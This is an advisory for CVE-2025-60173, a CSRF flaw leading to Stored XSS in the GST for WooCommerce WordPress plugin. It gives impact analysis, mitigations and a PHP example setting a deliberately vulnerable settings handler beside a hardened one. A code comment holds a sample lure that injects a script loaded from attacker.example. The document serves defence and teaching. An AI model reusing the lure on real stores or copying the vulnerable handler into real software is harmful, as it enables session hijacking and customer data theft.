CVE-2025-60173: CWE-352 Cross-Site Request Forgery (CSRF) in Ashwani kumar GST for WooCommerce

Severity: High
Published: Fri Sep 26 2025 (09/26/2025, 08:32:09 UTC)
Source: CVE Database V5
Vendor/Project: Ashwani kumar
Product: GST for WooCommerce

Description

Cross-Site Request Forgery (CSRF) vulnerability in Ashwani kumar GST for WooCommerce allows Stored XSS. This issue affects GST for WooCommerce: from n/a through 2.0.

AI-Powered Analysis

Last updated: 09/27/2025, 00:17:42 UTC

Technical Analysis

CVE-2025-60173 is a high-severity Cross-Site Request Forgery (CSRF) vulnerability in the Ashwani kumar GST for WooCommerce plugin, which adds Goods and Services Tax (GST) handling to WooCommerce stores. All versions up to and including 2.0 are affected. The root cause is a state-changing request handler that does not verify that the request was deliberately issued by the logged-in user. The CVE entry does not name the handler; in WordPress plugins this class of flaw typically means a form or admin action processed without a nonce check (wp_verify_nonce() or check_admin_referer()). An attacker who gets an authenticated administrator to open a page under the attacker's control can make the victim's browser submit the forged request with the victim's session cookies attached. Because the submitted value is then stored and later rendered without sanitisation or output escaping, the CSRF becomes Stored XSS: the injected script persists in the site's data and executes in the browser of every user who views the affected page. The CVSS 3.1 base score is 7.1 (High). The published components are AV:N (exploitable over the network), PR:N (the attacker needs no account on the site; it is the victim who must be logged in), UI:R (the victim must be lured to the attacker's page), S:C (the stored script executes in visitors' browsers, outside the component that was abused) and C:L/I:L/A:L; attack complexity is low, which is the only value that yields 7.1 for these components. No fix was available when the CVE was published, and no exploitation in the wild has been reported. The practical consequences are unauthorised changes to tax settings made in the administrator's name and injected scripts that can steal session tokens or customer data, alter what shoppers see, or otherwise disrupt the store. Tax settings are a sensitive target because a GST plugin is part of the compliance path for merchants in jurisdictions that levy GST.

Potential Impact

For European organisations the exposure is narrower than for a generic WooCommerce flaw: GST is primarily an Indian tax, so the affected population is mainly merchants who sell into or operate in GST jurisdictions and run this plugin on their WooCommerce store. Where it is installed, the consequences are serious. The Stored XSS component can be used to hijack administrator or customer sessions, steal personal and payment-related data entered on the site, or alter pages in ways that enable fraudulent transactions; any of these is likely to be a personal data breach notifiable under GDPR. The CSRF component lets an attacker make configuration changes in an administrator's name, which for a tax plugin can mean incorrect tax on orders and invoices, with the accounting and compliance clean-up that follows. The changed scope (S:C) reflects that the injected script runs in the browsers of everyone who views the affected page, so the damage is not confined to the plugin's own settings screen and can reach other parts of the WooCommerce installation or systems integrated with it. Given how much European retail runs on e-commerce and how strictly data protection and payment handling are regulated, exploitation would bring legal liability, reputational harm and direct financial loss.

Mitigation Recommendations

European organisations should first establish whether the Ashwani kumar GST for WooCommerce plugin is installed and which version is running; the version is shown on the WordPress Plugins screen and, with WP-CLI, in the output of `wp plugin list`. All versions up to and including 2.0 are affected. Because no fixed release was available at publication, the following mitigations apply:

1) Deactivate or remove the plugin until the vendor ships a fixed version. If it cannot be removed, restrict access to wp-admin (IP allow-listing or an additional authentication layer in front of it) so that a forged request from an administrator's browser is less likely to reach the site.
2) Add Web Application Firewall rules for the plugin's admin endpoints. A forged request is byte-for-byte identical to a legitimate one, so a WAF cannot recognise CSRF from the request body alone; what it can do is reject state-changing requests to wp-admin whose Origin or Referer header is missing or points to another site, and block obvious script payloads in form fields. Run such rules in logging mode first, since some legitimate clients strip Referer.
3) Deploy a Content Security Policy that limits script sources (nonces or hashes rather than 'unsafe-inline'). This reduces the impact of Stored XSS but does not remove the flaw, and the WordPress admin area and many plugins depend on inline scripts, so expect tuning.
4) Brief administrators: a CSRF attack only works while the victim is logged in, so they should not browse untrusted sites from a session that is logged into the store, should prefer a separate browser profile for administration, and should treat unsolicited links with suspicion.
5) Monitor for unexpected changes to the plugin's settings and for HTML or script tags appearing in tax-related options or in any page that displays them; an audit-logging plugin or periodic review of the relevant rows in the options table will surface this.
6) Track the vendor and Patchstack for a fixed release and deploy it as soon as it appears, then inspect the plugin's settings for injected content before trusting them again.
7) Review custom and third-party plugins for the same defect class: every state-changing handler should check a nonce and the caller's capability before acting, sanitise input on the way in and escape it on the way out.
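The following is an added example, not code from the GST for WooCommerce plugin or from Patchstack. It is a generic WordPress settings handler written to show the chain the analysis describes (a state change accepted without a nonce or capability check, stored unsanitised and echoed unescaped, so that CSRF becomes Stored XSS) next to the hardened form that item 7 asks for. The option name `example_gst_label`, the hook and action names, the admin page slug, the `manage_woocommerce` capability and the hostnames `shop.example` and `attacker.example` are all assumptions.

```php
<?php
/*
 * Added example, not code from the GST for WooCommerce plugin.
 * A generic WordPress settings handler in its vulnerable and hardened
 * forms. The option name, hook names, admin page slug, capability and
 * hostnames are assumptions.
 */

/* ---------- Vulnerable pattern (the CSRF -> Stored XSS chain) ---------- */

// admin_init fires on every wp-admin request, for any logged-in user,
// including low-privileged roles that can reach profile.php. Any request
// carrying 'gst_label' is saved: no nonce, no capability check, no sanitising.
function example_vuln_save_settings() {
	if ( isset( $_REQUEST['gst_label'] ) ) {
		update_option( 'example_gst_label', $_REQUEST['gst_label'] );
	}
}
add_action( 'admin_init', 'example_vuln_save_settings' );

// Constructed lure served from a page the attacker controls. Because the
// handler reads $_REQUEST, a top-level GET navigation is enough, and
// browsers still attach the victim's WordPress session cookies to a
// top-level navigation even under their SameSite=Lax default:
//
//   <script>
//     location = 'https://shop.example/wp-admin/?gst_label='
//              + encodeURIComponent('<script src=https://attacker.example/x.js><\/script>');
//   </script>
//
// The render function below echoes the stored value without escaping, so the
// injected script runs for every visitor who sees the label.
function example_vuln_render_label() {
	echo '<span class="gst-label">' . get_option( 'example_gst_label' ) . '</span>';
}

/* ---------- Hardened pattern ---------- */

function example_safe_settings_form() {
	?>
	<form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
		<?php wp_nonce_field( 'example_gst_save', 'example_gst_nonce' ); ?>
		<input type="hidden" name="action" value="example_gst_save">
		<label>GST label
			<input type="text" name="gst_label"
			       value="<?php echo esc_attr( get_option( 'example_gst_label', '' ) ); ?>">
		</label>
		<?php submit_button(); ?>
	</form>
	<?php
}

function example_safe_save_settings() {
	// 1. Capability: only users allowed to run the shop may change tax settings.
	//    This also stops a low-privileged logged-in user calling the action directly.
	if ( ! current_user_can( 'manage_woocommerce' ) ) {
		wp_die( esc_html__( 'Insufficient permissions.', 'example' ), '', array( 'response' => 403 ) );
	}
	// 2. Nonce: bound to this user, this action and a limited time window. A page on
	//    another origin cannot read it, so a forged request dies here with 403.
	check_admin_referer( 'example_gst_save', 'example_gst_nonce' );

	// 3. Sanitise on input: sanitize_text_field() strips tags, invalid UTF-8 and
	//    line breaks before the value reaches the database.
	$label = isset( $_POST['gst_label'] ) ? sanitize_text_field( wp_unslash( $_POST['gst_label'] ) ) : '';
	update_option( 'example_gst_label', $label );

	// Assumed settings page slug; redirect back after a successful save.
	wp_safe_redirect( admin_url( 'admin.php?page=example-gst&updated=1' ) );
	exit;
}
// admin_post_{action} only runs for authenticated users; the checks above still apply.
add_action( 'admin_post_example_gst_save', 'example_safe_save_settings' );

function example_safe_render_label() {
	// 4. Escape on output: a stored value can never become markup, even if a bad
	//    one reached the database through some other path (import, direct SQL).
	echo '<span class="gst-label">' . esc_html( get_option( 'example_gst_label', '' ) ) . '</span>';
}
```

The two checks in the hardened handler address different attackers: the capability check stops a logged-in but unprivileged account from changing the setting directly, and the nonce check stops a privileged user's browser from being made to change it on an attacker's behalf. Neither replaces output escaping, which is what turns a successful write of a bad value from Stored XSS into a harmless string.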

Technical Details

Data Version: 5.1
Assigner Short Name: Patchstack
Date Reserved: 2025-09-25T15:28:19.138Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 68d72b6279aa5c9d0854f4c5

Added to database: 9/27/2025, 12:10:10 AM

Last enriched: 9/27/2025, 12:17:42 AM

Last updated: 10/7/2025, 1:52:04 PM
